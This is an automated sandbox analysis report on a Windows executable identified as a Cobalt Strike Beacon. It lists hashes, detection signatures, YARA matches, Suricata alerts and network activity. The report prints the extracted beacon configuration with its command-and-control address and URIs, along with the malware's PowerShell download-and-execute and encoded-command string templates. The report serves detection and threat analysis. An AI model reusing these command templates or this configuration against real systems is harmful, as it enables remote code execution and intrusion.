
Windows Analysis Report
A1E0xfcSNl.exe

Overview

General Information

Sample name: A1E0xfcSNl.exe (renamed because the original name is a hash value)
Original sample name: f05982b55c7a85b9e71a941fe2295848.exe
Analysis ID: 1532360
MD5: f05982b55c7a85b9e71a941fe2295848
SHA1: b0df24778218a422f7a88083c9fb591f0499c36f
SHA256: 5462b422de6d759e45cc0269d564acbf0805c4441aba38bd28133c98d1187888
Tags: 64exe

Detection

CobaltStrike
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • A1E0xfcSNl.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\A1E0xfcSNl.exe" MD5: F05982B55C7A85B9E71A941FE2295848)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
Malware configuration (CobaltStrike):
{"BeaconType": ["HTTPS"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/en_US/all.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_CobaltStrike | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_CobaltStrike_3 | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_CobaltStrike_ee756db7 | Description: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown | Strings:
      • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
      • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
      • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
      • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
      • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
      • 0x32d6a:$a11: Could not open service control manager on %s: %d
      • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
      • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
      • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
      • 0x33255:$a15: could not create remote thread in %d: %d
      • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33203:$a17: could not write to process memory: %d
      • 0x32d9b:$a18: Could not create service %s on %s: %d
      • 0x32e24:$a19: Could not delete service %s on %s: %d
      • 0x32c89:$a20: Could not open process token: %d (%u)
Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_CobaltStrike_663fc95d | Description: Identifies CobaltStrike via unidentified function code | Author: unknown | Strings:
      • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_CobaltStrike_f0b627fc | Description: Rule for beacon reflective loader | Author: unknown | Strings:
      • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
(28 entries in total; only the first are shown)

Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack | Rule: JoeSecurity_CobaltStrike | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack | Rule: JoeSecurity_CobaltStrike_3 | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack | Rule: Windows_Trojan_CobaltStrike_ee756db7 | Description: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown | Strings:
          • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
          • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
          • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
          • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
          • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
          • 0x32d6a:$a11: Could not open service control manager on %s: %d
          • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
          • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
          • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
          • 0x33255:$a15: could not create remote thread in %d: %d
          • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33203:$a17: could not write to process memory: %d
          • 0x32d9b:$a18: Could not create service %s on %s: %d
          • 0x32e24:$a19: Could not delete service %s on %s: %d
          • 0x32c89:$a20: Could not open process token: %d (%u)
Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack | Rule: Windows_Trojan_CobaltStrike_663fc95d | Description: Identifies CobaltStrike via unidentified function code | Author: unknown | Strings:
          • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack | Rule: Windows_Trojan_CobaltStrike_f0b627fc | Description: Rule for beacon reflective loader | Author: unknown | Strings:
          • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
          • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
(40 entries in total; only the first are shown)

No Sigma rule has matched
Suricata IDS alerts:
Timestamp: 2024-10-13T01:58:06.131090+0200 | SID: 2035651 | Severity: 1 | Classtype: A Network Trojan was detected | Source IP: 89.197.154.116 | Source Port: 7810 | Destination IP: 192.168.2.4 | Destination Port: 49730 | Protocol: TCP

          AV Detection

Source: A1E0xfcSNl.exe | Avira: detected
Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/en_US/all.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: https://89.197.154.116:7810/en_US/all.jsM9 | Virustotal: Detection: 19%
Source: https://89.197.154.116:7810/dll | Virustotal: Detection: 19%
Source: https://89.197.154.116:7810/en_US/all.jshic | Virustotal: Detection: 20%
Source: https://89.197.154.116:7810/en_US/all.jsZ0 | Virustotal: Detection: 20%
Source: https://89.197.154.116:7810/ | Virustotal: Detection: 6%
Source: https://89.197.154.116:7810/l | Virustotal: Detection: 19%
Source: https://89.197.154.116:7810/.net | Virustotal: Detection: 20%
Source: https://89.197.154.116:7810// | Virustotal: Detection: 6%
Source: https://89.197.154.116:7810/en_US/all.jsom | Virustotal: Detection: 19%
Source: https://89.197.154.116:7810/en_US/all.js | Virustotal: Detection: 21%
Source: https://89.197.154.116/ | Virustotal: Detection: 20%
Source: 89.197.154.116 | Virustotal: Detection: 22%
Source: A1E0xfcSNl.exe | ReversingLabs: Detection: 84%
Source: A1E0xfcSNl.exe | Virustotal: Detection: 79%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: A1E0xfcSNl.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B1184 CryptAcquireContextA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext | 0_2_007B1184
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007E2020 CryptGenRandom | 0_2_007E2020
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C9220 malloc, _snprintf, FindFirstFileA, free, malloc, _snprintf, free, FindNextFileA, FindClose | 0_2_007C9220
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C1C30 malloc, GetCurrentDirectoryA, FindFirstFileA, GetLastError, free, free, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, FindNextFileA, FindClose | 0_2_007C1C30
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 4x nop then sub rsp, 28h | 0_2_00402314

          Networking

Source: Network traffic | Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 89.197.154.116:7810 -> 192.168.2.4:49730
Source: Malware configuration extractor | URLs: 89.197.154.116
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 89.197.154.116:7810
Source: Joe Sandbox View | IP Address: 89.197.154.116
Source: Joe Sandbox View | ASN Name: VIRTUAL1GB
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49738 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49730 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49737 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49736 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49739 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49734 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49735 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49732 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49733 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49760 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49766 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49771 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49775 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49777 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49769 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49776 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49770 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49773 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49764 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49768 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49759 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49778 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49772 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49780 -> 89.197.154.116:7810
          Source: unknown | TCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007BE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_007BE68C
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:%u/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2968344675.0000000003A47000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2575316910.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2696799052.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2745045226.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651363582.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2698625132.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744902985.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2587345424.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2792724674.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/2
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/?
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/J
          Source: A1E0xfcSNl.exe, 00000000.00000003.2745045226.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2840042170.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841784165.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744902985.0000000003A06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/Low
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/Lowy
          Source: A1E0xfcSNl.exe, 00000000.00000003.2891272705.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2889324959.0000000003A06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/Low~
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/N
          Source: A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/Q
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/Y
          Source: A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/Z
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/f
          Source: A1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/i
          Source: A1E0xfcSNl.exe, 00000000.00000003.2841784165.00000000039FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msd
          Source: A1E0xfcSNl.exe, 00000000.00000003.2613338606.00000000039A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2616187536.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2614484255.00000000039CD000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625609224.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2615740912.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625562236.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625686592.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2615920623.00000000039F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trust5
          Source: A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/a
